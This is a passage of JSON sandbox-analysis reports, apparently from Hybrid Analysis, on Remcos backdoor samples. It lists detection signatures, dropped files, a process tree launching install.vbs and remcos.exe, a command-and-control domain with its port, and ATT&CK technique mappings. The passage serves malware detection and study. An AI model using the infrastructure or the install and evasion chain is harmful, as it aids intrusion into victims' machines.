KERNELBASE.DLL)\n Found string \"CreateSemaphoreW\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNEL32.DLL)\n Found string \"CreateSemaphoreExW\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"CreateThreadpoolTimer\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"CreateThreadpoolWait\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"CreateSymbolicLinkW\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNEL32.DLL)\n Found string \"GetTickCount64\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"GetFileInformationByHandleEx\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNEL32.DLL)\n Found string \"SetFileInformationByHandle\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"SleepConditionVariableSRW\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNEL32.DLL)\n Found string \"CreateThreadpoolWork\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"CompareStringEx\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"GetLocaleInfoEx\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"LCMapStringEx\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"AreFileApisANSI\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"EnumSystemLocalesEx\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"GetDateFormatEx\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNEL32.DLL)\n Found string \"GetTimeFormatEx\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNEL32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb\" has section name .text with entropy \"6.6333094624526705\"\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb\" has section name .reloc with entropy \"6.670616452336316\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-6", "type": 7, "relevance": 5, "name": "Contacts random domain names", "description": "\"wormbit.ydns.eu\" seems to be random", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"C:\\6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" connects to <IPv4> on port 23101 (TCP); Domain: \"wormbit.ydns.eu\"\n Process \"C:\\6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" connects to <IPv4> on port 80 (TCP); Domain: \"geoplugin.net\"", "origin": "Monitored Target", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYENABLE\"; Value: \"00000000\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYSERVER\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYOVERRIDE\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 23101", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-24", "type": 7, "relevance": 6, "name": "Tries to identify its external IP address", "description": "\"geoplugin.net\"", "origin": "Network Traffic", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "suricata-2", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET JA3 Hash - Remcos 3.x/4.x TLS Connection\" (SID: 2036594, Rev: 1, Severity: 1) categorized as \"Malware Command and Control Activity Detected\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc
https://hybrid-analysis.com/sample/04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc
Hybrid Analysis - Remcos
{"size": 380928, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc", "sha256": "04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc", "av_detect": 89, "vx_family": "Backdoor.Remcos", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 22, "total_signatures": 237, "extracted_files": [{"name": "remcos.exe", "file_path": "%APPDATA%\\remcos\\remcos.exe", "file_size": 380928, "sha256": "02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "remcos.exe (PID: 2528)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hab.exe", "file_path": "%TEMP%\\hab.exe", "file_size": 380928, "sha256": "89bc0b0c1bea0ff9ea3aea5a0ad58aa7cfc50cad5c9b00200ee3dcf72d601263", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "WScript.exe (PID: 3080)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hab.vbs", "file_path": "%TEMP%\\hab.vbs", "file_size": 94, "sha256": "f6d7a1d3610e961155a744a19c8da5506fdb58edc7802307f1721a67de2e7656", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "runtime_process": "remcos.exe (PID: 4516)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "install.vbs", "file_path": "%TEMP%\\install.vbs", "file_size": 544, "sha256": "284befd9ca0d4ec1a2722cbb0e682d17c70a5ff721bc6d23865a3e6832344568", "type_tags": ["data"], "description": "data", "runtime_process": "WScript.exe (PID: 3080)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "win.ini", "file_path": "%WINDIR%\\win.ini", "file_size": 507, "sha256": "3136215383c0ca2991297bfcd6648b719a7f57d3b93f021bec11583e45ef7e37", "type_tags": ["data"], "description": "data", "runtime_process": "hab.exe (PID: 6044)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 9782)", "8 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 8783)", "1 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File contains assembly code", "File is the product of a small codebase (10 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00005844", "name": "04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe", "normalized_path": "C:\\04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe", "sha256": "04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc"}, {"uid": "00000000-00005840", "parentuid": "00000000-00005844", "name": "04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe", "normalized_path": "C:\\04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe", "sha256": "04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc"}, {"uid": "00000000-00006044", "parentuid": "00000000-00005840", "name": "hab.exe", "normalized_path": "%TEMP%\\hab.exe", "sha256": "75fb93ce12a9729608290463abf313012ffc37030cfee0d7484081339354e4bc"}, {"uid": "00000000-00006072", "parentuid": "00000000-00006044", "name": "hab.exe", "normalized_path": "%TEMP%\\hab.exe", "sha256": "75fb93ce12a9729608290463abf313012ffc37030cfee0d7484081339354e4bc"}, {"uid": "00000000-00003000", "parentuid": "00000000-00006072", "name": "WScript.exe", "normalized_path": "%WINDIR%\\System32\\WScript.exe", "command_line": "\"%TEMP%\\install.vbs\"", "sha256": "2160ba6829909eeb1d272ac4a5f43588750c0b4743477bf2b46952033b5d4b3b"}, {"uid": "00000000-00001212", "parentuid": "00000000-00003000", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/c \"%APPDATA%\\remcos\\remcos.exe\"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00003276", "parentuid": "00000000-00001212", "name": "remcos.exe", "normalized_path": "%APPDATA%\\remcos\\remcos.exe", "sha256": "75fb93ce12a9729608290463abf313012ffc37030cfee0d7484081339354e4bc"}, {"uid": "00000000-00001464", "parentuid": "00000000-00003276", "name": "remcos.exe", "normalized_path": "%APPDATA%\\remcos\\remcos.exe", "sha256": "75fb93ce12a9729608290463abf313012ffc37030cfee0d7484081339354e4bc"}, {"uid": "00000000-00004444", "parentuid": "00000000-00001464", "name": "hab.exe", "normalized_path": "%TEMP%\\hab.exe", "sha256": "2d716c848b828ba3596aa16d596305fc0759203d74d531228ed654dfb699193e"}, {"uid": "00000000-00003528", "parentuid": "00000000-00004444", "name": "hab.exe", "normalized_path": "%TEMP%\\hab.exe", "sha256": "2d716c848b828ba3596aa16d596305fc0759203d74d531228ed654dfb699193e"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 4, "informative_identifiers_count": 15}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Visual Basic", "attck_id": "T1059.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": 